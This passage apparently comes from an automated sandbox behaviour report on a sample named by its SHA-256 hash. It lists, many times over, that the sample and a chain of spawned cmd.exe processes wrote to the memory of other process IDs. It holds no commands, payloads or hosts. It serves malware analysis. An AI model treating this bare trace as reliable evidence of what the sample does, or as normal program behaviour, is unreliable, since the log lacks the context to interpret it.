cmd.exe 228 PID 940 wrote to memory of 1444 940 cmd.exe 228 PID 940 wrote to memory of 1444 940 cmd.exe 228 PID 1444 wrote to memory of 1920 1444 cmd.exe 229 PID 1444 wrote to memory of 1920 1444 cmd.exe 229 PID 1444 wrote to memory of 1920 1444 cmd.exe 229 PID 1444 wrote to memory of 1920 1444 cmd.exe 229 PID 940 wrote to memory of 1908 940 cmd.exe 230 PID 940 wrote to memory of 1908 940 cmd.exe 230 PID 940 wrote to memory of 1908 940 cmd.exe 230 PID 940 wrote to memory of 1908 940 cmd.exe 230 PID 1460 wrote to memory of 1992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 231 PID 1460 wrote to memory of 1992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 231 PID 1460 wrote to memory of 1992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 231 PID 1460 wrote to memory of 1992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 231 PID 1992 wrote to memory of 320 1992 cmd.exe 233 PID 1992 wrote to memory of 320 1992 cmd.exe 233 PID 1992 wrote to memory of 320 1992 cmd.exe 233 PID 1992 wrote to memory of 320 1992 cmd.exe 233 PID 1992 wrote to memory of 1480 1992 cmd.exe 234 PID 1992 wrote to memory of 1480 1992 cmd.exe 234 PID 1992 wrote to memory of 1480 1992 cmd.exe 234 PID 1992 wrote to memory of 1480 1992 cmd.exe 234 PID 1992 wrote to memory of 880 1992 cmd.exe 235 PID 1992 wrote to memory of 880 1992 cmd.exe 235 PID 1992 wrote to memory of 880 1992 cmd.exe 235 PID 1992 wrote to memory of 880 1992 cmd.exe 235 PID 880 wrote to memory of 1988 880 cmd.exe 236 PID 880 wrote to memory of 1988 880 cmd.exe 236 PID 880 wrote to memory of 1988 880 cmd.exe 236 PID 880 wrote to memory of 1988 880 cmd.exe 236 PID 1992 wrote to memory of 1496 1992 cmd.exe 237 PID 1992 wrote to memory of 1496 1992 cmd.exe 237 PID 1992 wrote to memory of 1496 1992 cmd.exe 237 PID 1992 wrote to memory of 1496 1992 cmd.exe 237 PID 1460 wrote to memory of 1536 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 238 PID 1460 wrote to memory of 1536 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 238 PID 1460 wrote to memory of 1536 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 238 PID 1460 wrote to memory of 1536 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 238 PID 1536 wrote to memory of 1380 1536 cmd.exe 240 PID 1536 wrote to memory of 1380 1536 cmd.exe 240 PID 1536 wrote to memory of 1380 1536 cmd.exe 240 PID 1536 wrote to memory of 1380 1536 cmd.exe 240 PID 1536 wrote to memory of 832 1536 cmd.exe 241 PID 1536 wrote to memory of 832 1536 cmd.exe 241 PID 1536 wrote to memory of 832 1536 cmd.exe 241 PID 1536 wrote to memory of 832 1536 cmd.exe 241 PID 2044 wrote to memory of 1444 2044 cmd.exe 242 PID 2044 wrote to memory of 1444 2044 cmd.exe 242 PID 2044 wrote to memory of 1444 2044 cmd.exe 242 PID 1536 wrote to memory of 1752 1536 cmd.exe 243 PID 1536 wrote to memory of 1752 1536 cmd.exe 243 PID 1536 wrote to memory of 1752 1536 cmd.exe 243 PID 1536 wrote to memory of 1752 1536 cmd.exe 243 PID 1752 wrote to memory of 744 1752 cmd.exe 244 PID 1752 wrote to memory of 744 1752 cmd.exe 244 PID 1752 wrote to memory of 744 1752 cmd.exe 244 PID 1752 wrote to memory of 744 1752 cmd.exe 244 PID 1536 wrote to memory of 1144 1536 cmd.exe 245 PID 1536 wrote to memory of 1144 1536 cmd.exe 245 PID 1536 wrote to memory of 1144 1536 cmd.exe 245 PID 1536 wrote to memory of 1144 1536 cmd.exe 245 PID 1460 wrote to memory of 396 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 246 PID 1460 wrote to memory of 396 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 246 PID 1460 wrote to memory of 396 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 246 PID 1460 wrote to memory of 396 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 246 PID 396 wrote to memory of 956 396 cmd.exe 248 PID 396 wrote to memory of 956 396 cmd.exe 248 PID 396 wrote to memory of 956 396 cmd.exe 248 PID 396 wrote to memory of 956 396 cmd.exe 248 PID 396 wrote to memory of 1756 396 cmd.exe 249 PID 396 wrote to memory of 1756 396 cmd.exe 249 PID 396 wrote to memory of 1756 396 cmd.exe 249 PID 396 wrote to memory of 1756 396 cmd.exe 249 PID 396 wrote to memory of 1824 396 cmd.exe 250 PID 396 wrote to memory of 1824 396 cmd.exe 250 PID 396 wrote to memory of 1824 396 cmd.exe 250 PID 396 wrote to memory of 1824 396 cmd.exe 250 PID 1824 wrote to memory of 1836 1824 cmd.exe 251 PID 1824 wrote to memory of 1836 1824 cmd.exe 251 PID 1824 wrote to memory of 1836 1824 cmd.exe 251 PID 1824 wrote to memory of 1836 1824 cmd.exe 251 PID 2044 wrote to memory of 968 2044 cmd.exe 252 PID 2044 wrote to memory of 968 2044 cmd.exe 252 PID 2044 wrote to memory of 968 2044 cmd.exe 252 PID 396 wrote to memory of 1800 396 cmd.exe 253 PID 396 wrote to memory of 1800 396 cmd.exe 253 PID 396 wrote to memory of 1800 396 cmd.exe 253 PID 396 wrote to memory of 1800 396 cmd.exe 253 PID 1460 wrote to memory of 1028 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 254 PID 1460 wrote to memory of 1028 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 254 PID 1460 wrote to memory of 1028 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 254 PID 1460 wrote to memory of 1028 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 254 PID 2044 wrote to memory of 1068 2044 cmd.exe 256 PID 2044 wrote to memory of 1068 2044 cmd.exe 256 PID 2044 wrote to memory of 1068 2044 cmd.exe 256 PID 1028 wrote to memory of 1916 1028 cmd.exe 257 PID 1028 wrote to memory of 1916 1028 cmd.exe 257 PID 1028 wrote to memory of 1916 1028 cmd.exe 257 PID 1028 wrote to memory of 1916 1028 cmd.exe 257 PID 1028 wrote to memory of 208 1028 cmd.exe 258 PID 1028 wrote to memory of 208 1028 cmd.exe 258 PID 1028 wrote to memory of 208 1028 cmd.exe 258 PID 1028 wrote to memory of 208 1028 cmd.exe 258 PID 1028 wrote to memory of 992 1028 cmd.exe 259 PID 1028 wrote to memory of 992 1028 cmd.exe 259 PID 1028 wrote to memory of 992 1028 cmd.exe 259 PID 1028 wrote to memory of 992 1028 cmd.exe 259 PID 992 wrote to memory of 1908 992 cmd.exe 260 PID 992 wrote to memory of 1908 992 cmd.exe 260 PID 992 wrote to memory of 1908 992 cmd.exe 260 PID 992 wrote to memory of 1908 992 cmd.exe 260 PID 1028 wrote to memory of 1868 1028 cmd.exe 261 PID 1028 wrote to memory of 1868 1028 cmd.exe 261 PID 1028 wrote to memory of 1868 1028 cmd.exe 261 PID 1028 wrote to memory of 1868 1028 cmd.exe 261 PID 1460 wrote to memory of 1928 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 262 PID 1460 wrote to memory of 1928 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 262 PID 1460 wrote to memory of 1928 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 262 PID 1460 wrote to memory of 1928 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 262 PID 1928 wrote to memory of 1476 1928 cmd.exe 264 PID 1928 wrote to memory of 1476 1928 cmd.exe 264 PID 1928 wrote to memory of 1476 1928 cmd.exe 264 PID 1928 wrote to memory of 1476 1928 cmd.exe 264 PID 1928 wrote to memory of 956 1928 cmd.exe 265 PID 1928 wrote to memory of 956 1928 cmd.exe 265 PID 1928 wrote to memory of 956 1928 cmd.exe 265 PID 1928 wrote to memory of 956 1928 cmd.exe 265 PID 1928 wrote to memory of 1756 1928 cmd.exe 266 PID 1928 wrote to memory of 1756 1928 cmd.exe 266 PID 1928 wrote to memory of 1756 1928 cmd.exe 266 PID 1928 wrote to memory of 1756 1928 cmd.exe 266 PID 1756 wrote to memory of 1260 1756 cmd.exe 267 PID 1756 wrote to memory of 1260 1756 cmd.exe 267 PID 1756 wrote to memory of 1260 1756 cmd.exe 267 PID 1756 wrote to memory of 1260 1756 cmd.exe 267 PID 1928 wrote to memory of 1444 1928 cmd.exe 268 PID 1928 wrote to memory of 1444 1928 cmd.exe 268 PID 1928 wrote to memory of 1444 1928 cmd.exe 268 PID 1928 wrote to memory of 1444 1928 cmd.exe 268 PID 1460 wrote to memory of 560 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 269 PID 1460 wrote to memory of 560 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 269 PID 1460 wrote to memory of 560 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 269 PID 1460 wrote to memory of 560 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 269 PID 560 wrote to memory of 1820 560 cmd.exe 271 PID 560 wrote to memory of 1820 560 cmd.exe 271 PID 560 wrote to memory of 1820 560 cmd.exe 271 PID 560 wrote to memory of 1820 560 cmd.exe 271 PID 560 wrote to memory of 780 560 cmd.exe 272 PID 560 wrote to memory of 780 560 cmd.exe 272 PID 560 wrote to memory of 780 560 cmd.exe 272 PID 560 wrote to memory of 780 560 cmd.exe 272 PID 560 wrote to memory of 572 560 cmd.exe 273 PID 560 wrote to memory of 572 560 cmd.exe 273 PID 560 wrote to memory of 572 560 cmd.exe 273 PID 560 wrote to memory of 572 560 cmd.exe 273 PID 572 wrote to memory of 1916 572 cmd.exe 274 PID 572 wrote to memory of 1916 572 cmd.exe 274 PID 572 wrote to memory of 1916 572 cmd.exe 274 PID 572 wrote to memory of 1916 572 cmd.exe 274 PID 560 wrote to memory of 940 560 cmd.exe 275 PID 560 wrote to memory of 940 560 cmd.exe 275 PID 560 wrote to memory of 940 560 cmd.exe 275 PID 560 wrote to memory of 940 560 cmd.exe 275 PID 1460 wrote to memory of 828 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 276 PID 1460 wrote to memory of 828 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 276 PID 1460 wrote to memory of 828 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 276 PID 1460 wrote to memory of 828 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 276 PID 828 wrote to memory of 676 828 cmd.exe 278 PID 828 wrote to memory of 676 828 cmd.exe 278 PID 828 wrote to memory of 676 828 cmd.exe 278 PID 828 wrote to memory of 676 828 cmd.exe 278 PID 828 wrote to memory of 1316 828 cmd.exe 279 PID 828 wrote to memory of 1316 828 cmd.exe 279 PID 828 wrote to memory of 1316 828 cmd.exe 279 PID 828 wrote to memory of 1316 828 cmd.exe 279 PID 828 wrote to memory of 952 828 cmd.exe 280 PID 828 wrote to memory of 952 828 cmd.exe 280 PID 828 wrote to memory of 952 828 cmd.exe 280 PID 828 wrote to memory of 952 828 cmd.exe 280 PID 952 wrote to memory of 1476 952 cmd.exe 281 PID 952 wrote to memory of 1476 952 cmd.exe 281 PID 952 wrote to memory of 1476 952 cmd.exe 281 PID 952 wrote to memory of 1476 952 cmd.exe 281 PID 828 wrote to memory of 1852 828 cmd.exe 282 PID 828 wrote to memory of 1852 828 cmd.exe 282 PID 828 wrote to memory of 1852 828 cmd.exe 282 PID 828 wrote to memory of 1852 828 cmd.exe 282 PID 1460 wrote to memory of 800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 283 PID 1460 wrote to memory of 800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 283 PID 1460 wrote to memory of 800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 283 PID 1460 wrote to memory of 800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 283 PID 800 wrote to memory of 1072 800 cmd.exe 285 PID 800 wrote to memory of 1072 800 cmd.exe 285 PID 800 wrote to memory of 1072 800 cmd.exe 285 PID 800 wrote to memory of 1072 800 cmd.exe 285 PID 800 wrote to memory of 1264 800 cmd.exe 286 PID 800 wrote to memory of 1264 800 cmd.exe 286 PID 800 wrote to memory of 1264 800 cmd.exe 286 PID 800 wrote to memory of 1264 800 cmd.exe 286 PID 800 wrote to memory of 1444 800 cmd.exe 287 PID 800 wrote to memory of 1444 800 cmd.exe 287 PID 800 wrote to memory of 1444 800 cmd.exe 287 PID 800 wrote to memory of 1444 800 cmd.exe 287 PID 1444 wrote to memory of 1780 1444 cmd.exe 288 PID 1444 wrote to memory of 1780 1444 cmd.exe 288 PID 1444 wrote to memory of 1780 1444 cmd.exe 288 PID 1444 wrote to memory of 1780 1444 cmd.exe 288 PID 800 wrote to memory of 960 800 cmd.exe 289 PID 800 wrote to memory of 960 800 cmd.exe 289 PID 800 wrote to memory of 960 800 cmd.exe 289 PID 800 wrote to memory of 960 800 cmd.exe 289 PID 1460 wrote to memory of 1380 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 290 PID 1460 wrote to memory of 1380 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 290 PID 1460 wrote to memory of 1380 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 290 PID 1460 wrote to memory of 1380 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 290 PID 1380 wrote to memory of 1284 1380 cmd.exe 292 PID 1380 wrote to memory of 1284 1380 cmd.exe 292 PID 1380 wrote to memory of 1284 1380 cmd.exe 292 PID 1380 wrote to memory of 1284 1380 cmd.exe 292 PID 1380 wrote to memory of 1908 1380 cmd.exe 293 PID 1380 wrote to memory of 1908 1380 cmd.exe 293 PID 1380 wrote to memory of 1908 1380 cmd.exe 293 PID 1380 wrote to memory of 1908 1380 cmd.exe 293 PID 1380 wrote to memory of 1572 1380 cmd.exe 294 PID 1380 wrote to memory of 1572 1380 cmd.exe 294 PID 1380 wrote to memory of 1572 1380 cmd.exe 294 PID 1380 wrote to memory of 1572 1380 cmd.exe 294 PID 1572 wrote to memory of 1992 1572 cmd.exe 295 PID 1572 wrote to memory of 1992 1572 cmd.exe 295 PID 1572 wrote to memory of 1992 1572 cmd.exe 295 PID 1572 wrote to memory of 1992 1572 cmd.exe 295 PID 1380 wrote to memory of 816 1380 cmd.exe 296 PID 1380 wrote to memory of 816 1380 cmd.exe 296 PID 1380 wrote to memory of 816 1380 cmd.exe 296 PID 1380 wrote to memory of 816 1380 cmd.exe 296 PID 1460 wrote to memory of 1536 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 297 PID 1460 wrote to memory of 1536 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 297 PID 1460 wrote to memory of 1536 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 297 PID 1460 wrote to memory of 1536 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 297 PID 1536 wrote to memory of 1476 1536 cmd.exe 299 PID 1536 wrote to memory of 1476 1536 cmd.exe 299 PID 1536 wrote to memory of 1476 1536 cmd.exe 299 PID 1536 wrote to memory of 1476 1536 cmd.exe 299 PID 1536 wrote to memory of 1980 1536 cmd.exe 300 PID 1536 wrote to memory of 1980 1536 cmd.exe 300 PID 1536 wrote to memory of 1980 1536 cmd.exe 300 PID 1536 wrote to memory of 1980 1536 cmd.exe 300 PID 1536 wrote to memory of 1084 1536 cmd.exe 301 PID 1536 wrote to memory of 1084 1536 cmd.exe 301 PID 1536 wrote to memory of 1084 1536 cmd.exe 301 PID 1536 wrote to memory of 1084 1536 cmd.exe 301 PID 1084 wrote to memory of 556 1084 cmd.exe 302 PID 1084 wrote to memory of 556 1084 cmd.exe 302 PID 1084 wrote to memory of 556 1084 cmd.exe 302 PID 1084 wrote to memory of 556 1084 cmd.exe 302 PID 1536 wrote to memory of 880 1536 cmd.exe 303 PID 1536 wrote to memory of 880 1536 cmd.exe 303 PID 1536 wrote to memory of 880 1536 cmd.exe 303 PID 1536 wrote to memory of 880 1536 cmd.exe 303 PID 1460 wrote to memory of 1224 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 304 PID 1460 wrote to memory of 1224 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 304 PID 1460 wrote to memory of 1224 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 304 PID 1460 wrote to memory of 1224 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 304 PID 1224 wrote to memory of 1424 1224 cmd.exe 306 PID 1224 wrote to memory of 1424 1224 cmd.exe 306 PID 1224 wrote to memory of 1424 1224 cmd.exe 306 PID 1224 wrote to memory of 1424 1224 cmd.exe 306 PID 1224 wrote to memory of 968 1224 cmd.exe 307 PID 1224 wrote to memory of 968 1224 cmd.exe 307 PID 1224 wrote to memory of 968 1224 cmd.exe 307 PID 1224 wrote to memory of 968 1224 cmd.exe 307 PID 1224 wrote to memory of 960 1224 cmd.exe 308 PID 1224 wrote to memory of 960 1224 cmd.exe 308 PID 1224 wrote to memory of 960 1224 cmd.exe 308 PID 1224 wrote to memory of 960 1224 cmd.exe 308 PID 960 wrote to memory of 1480 960 cmd.exe 309 PID 960 wrote to memory of 1480 960 cmd.exe 309 PID 960 wrote to memory of 1480 960 cmd.exe 309 PID 960 wrote to memory of 1480 960 cmd.exe 309 PID 1224 wrote to memory of 204 1224 cmd.exe 310 PID 1224 wrote to memory of 204 1224 cmd.exe 310 PID 1224 wrote to memory of 204 1224 cmd.exe 310 PID 1224 wrote to memory of 204 1224 cmd.exe 310 PID 1460 wrote to memory of 992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 311 PID 1460 wrote to memory of 992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 311 PID 1460 wrote to memory of 992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 311 PID 1460 wrote to memory of 992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 311 PID 992 wrote to memory of 560 992 cmd.exe 313 PID 992 wrote to memory of 560 992 cmd.exe 313 PID 992 wrote to memory of 560 992 cmd.exe 313 PID 992 wrote to memory of 560 992 cmd.exe 313 PID 992 wrote to memory of 1848 992 cmd.exe 314 PID 992 wrote to memory of 1848 992 cmd.exe 314 PID 992 wrote to memory of 1848 992 cmd.exe 314 PID 992 wrote to memory of 1848 992 cmd.exe 314 PID 992 wrote to memory of 1028 992 cmd.exe 315 PID 992 wrote to memory of 1028 992 cmd.exe 315 PID 992 wrote to memory of 1028 992 cmd.exe 315 PID 992 wrote to memory of 1028 992 cmd.exe 315 PID 1028 wrote to memory of 1876 1028 cmd.exe 316 PID 1028 wrote to memory of 1876 1028 cmd.exe 316 PID 1028 wrote to memory of 1876 1028 cmd.exe 316 PID 1028 wrote to memory of 1876 1028 cmd.exe 316 PID 992 wrote to memory of 1568 992 cmd.exe 317 PID 992 wrote to memory of 1568 992 cmd.exe 317 PID 992 wrote to memory of 1568 992 cmd.exe 317 PID 992 wrote to memory of 1568 992 cmd.exe 317 PID 1460 wrote to memory of 904 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 318 PID 1460 wrote to memory of 904 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 318 PID 1460 wrote to memory of 904 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 318 PID 1460 wrote to memory of 904 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 318 PID 904 wrote to memory of 1260 904 cmd.exe 320 PID 904 wrote to memory of 1260 904 cmd.exe 320 PID 904 wrote to memory of 1260 904 cmd.exe 320 PID 904 wrote to memory of 1260 904 cmd.exe 320 PID 904 wrote to memory of 1756 904 cmd.exe 321 PID 904 wrote to memory of 1756 904 cmd.exe 321 PID 904 wrote to memory of 1756 904 cmd.exe 321 PID 904 wrote to memory of 1756 904 cmd.exe 321 PID 904 wrote to memory of 1536 904 cmd.exe 322 PID 904 wrote to memory of 1536 904 cmd.exe 322 PID 904 wrote to memory of 1536 904 cmd.exe 322 PID 904 wrote to memory of 1536 904 cmd.exe 322 PID 1536 wrote to memory of 1264 1536 cmd.exe 323 PID 1536 wrote to memory of 1264 1536 cmd.exe 323 PID 1536 wrote to memory of 1264 1536 cmd.exe 323 PID 1536 wrote to memory of 1264 1536 cmd.exe 323 PID 904 wrote to memory of 1424 904 cmd.exe 324 PID 904 wrote to memory of 1424 904 cmd.exe 324 PID 904 wrote to memory of 1424 904 cmd.exe 324 PID 904 wrote to memory of 1424 904 cmd.exe 324 PID 1460 wrote to memory of 1836 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 325 PID 1460 wrote to memory of 1836 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 325 PID 1460 wrote to memory of 1836 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 325 PID 1460 wrote to memory of 1836 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 325 PID 1836 wrote to memory of 1916 1836 cmd.exe 327 PID 1836 wrote to memory of 1916 1836 cmd.exe 327 PID 1836 wrote to memory of 1916 1836 cmd.exe 327 PID 1836 wrote to memory of 1916 1836 cmd.exe 327 PID 1836 wrote to memory of 1824 1836 cmd.exe 328 PID 1836 wrote to memory of 1824 1836 cmd.exe 328 PID 1836 wrote to memory of 1824 1836 cmd.exe 328 PID 1836 wrote to memory of 1824 1836 cmd.exe 328 PID 1836 wrote to memory of 1864 1836 cmd.exe 329 PID 1836 wrote to memory of 1864 1836 cmd.exe 329 PID 1836 wrote to memory of 1864 1836 cmd.exe 329 PID 1836 wrote to memory of 1864 1836 cmd.exe 329 PID 1864 wrote to memory of 1908 1864 cmd.exe 330 PID 1864 wrote to memory of 1908 1864 cmd.exe 330 PID 1864 wrote to memory of 1908 1864 cmd.exe 330 PID 1864 wrote to memory of 1908 1864 cmd.exe 330 PID 1836 wrote to memory of 560 1836 cmd.exe 331 PID 1836 wrote to memory of 560 1836 cmd.exe 331 PID 1836 wrote to memory of 560 1836 cmd.exe 331 PID 1836 wrote to memory of 560 1836 cmd.exe 331 PID 1460 wrote to memory of 208 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 332 PID 1460 wrote to memory of 208 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 332 PID 1460 wrote to memory of 208 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 332 PID 1460 wrote to memory of 208 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 332 PID 208 wrote to memory of 972 208 cmd.exe 334 PID 208 wrote to memory of 972 208 cmd.exe 334 PID 208 wrote to memory of 972 208 cmd.exe 334 PID 208 wrote to memory of 972 208 cmd.exe 334 PID 208 wrote to memory of 1568 208 cmd.exe 335 PID 208 wrote to memory of 1568 208 cmd.exe 335 PID 208 wrote to memory of 1568 208 cmd.exe 335 PID 208 wrote to memory of 1568 208 cmd.exe 335 PID 208 wrote to memory of 992 208 cmd.exe 336 PID 208 wrote to memory of 992 208 cmd.exe 336 PID 208 wrote to memory of 992 208 cmd.exe 336 PID 208 wrote to memory of 992 208 cmd.exe 336 PID 992 wrote to memory of 1228 992 cmd.exe 337 PID 992 wrote to memory of 1228 992 cmd.exe 337 PID 992 wrote to memory of 1228 992 cmd.exe 337 PID 992 wrote to memory of 1228 992 cmd.exe 337 PID 208 wrote to memory of 1912 208 cmd.exe 338 PID 208 wrote to memory of 1912 208 cmd.exe 338 PID 208 wrote to memory of 1912 208 cmd.exe 338 PID 208 wrote to memory of 1912 208 cmd.exe 338 PID 1460 wrote to memory of 1068 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 339 PID 1460 wrote to memory of 1068 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 339 PID 1460 wrote to memory of 1068 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 339 PID 1460 wrote to memory of 1068 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 339 PID 1068 wrote to memory of 744 1068 cmd.exe 341 PID 1068 wrote to memory of 744 1068 cmd.exe 341 PID 1068 wrote to memory of 744 1068 cmd.exe 341 PID 1068 wrote to memory of 744 1068 cmd.exe 341 PID 1068 wrote to memory of 896 1068 cmd.exe 342 PID 1068 wrote to memory of 896 1068 cmd.exe 342 PID 1068 wrote to memory of 896 1068 cmd.exe 342 PID 1068 wrote to memory of 896 1068 cmd.exe 342 PID 1068 wrote to memory of 1424 1068 cmd.exe 343 PID 1068 wrote to memory of 1424 1068 cmd.exe 343 PID 1068 wrote to memory of 1424 1068 cmd.exe 343 PID 1068 wrote to memory of 1424 1068 cmd.exe 343 PID 1424 wrote to memory of 904 1424 cmd.exe 344 PID 1424 wrote to memory of 904 1424 cmd.exe 344 PID 1424 wrote to memory of 904 1424 cmd.exe 344 PID 1424 wrote to memory of 904 1424 cmd.exe 344 PID 1068 wrote to memory of 204 1068 cmd.exe 345 PID 1068 wrote to memory of 204 1068 cmd.exe 345 PID 1068 wrote to memory of 204 1068 cmd.exe 345 PID 1068 wrote to memory of 204 1068 cmd.exe 345 PID 1460 wrote to memory of 1224 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 346 PID 1460 wrote to memory of 1224 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 346 PID 1460 wrote to memory of 1224 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 346 PID 1460 wrote to memory of 1224 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 346 PID 1224 wrote to memory of 1908 1224 cmd.exe 348 PID 1224 wrote to memory of 1908 1224 cmd.exe 348 PID 1224 wrote to memory of 1908 1224 cmd.exe 348 PID 1224 wrote to memory of 1908 1224 cmd.exe 348 PID 1224 wrote to memory of 1152 1224 cmd.exe 349 PID 1224 wrote to memory of 1152 1224 cmd.exe 349 PID 1224 wrote to memory of 1152 1224 cmd.exe 349 PID 1224 wrote to memory of 1152 1224 cmd.exe 349 PID 1224 wrote to memory of 832 1224 cmd.exe 350 PID 1224 wrote to memory of 832 1224 cmd.exe 350 PID 1224 wrote to memory of 832 1224 cmd.exe 350 PID 1224 wrote to memory of 832 1224 cmd.exe 350 PID 832 wrote to memory of 1836 832 cmd.exe 351 PID 832 wrote to memory of 1836 832 cmd.exe 351 PID 832 wrote to memory of 1836 832 cmd.exe 351 PID 832 wrote to memory of 1836 832 cmd.exe 351 PID 1224 wrote to memory of 1476 1224 cmd.exe 352 PID 1224 wrote to memory of 1476 1224 cmd.exe 352 PID 1224 wrote to memory of 1476 1224 cmd.exe 352 PID 1224 wrote to memory of 1476 1224 cmd.exe 352 PID 1460 wrote to memory of 432 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 353 PID 1460 wrote to memory of 432 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 353 PID 1460 wrote to memory of 432 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 353 PID 1460 wrote to memory of 432 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 353 PID 432 wrote to memory of 1800 432 cmd.exe 355 PID 432 wrote to memory of 1800 432 cmd.exe 355 PID 432 wrote to memory of 1800 432 cmd.exe 355 PID 432 wrote to memory of 1800 432 cmd.exe 355 PID 432 wrote to memory of 1072 432 cmd.exe 356 PID 432 wrote to memory of 1072 432 cmd.exe 356 PID 432 wrote to memory of 1072 432 cmd.exe 356 PID 432 wrote to 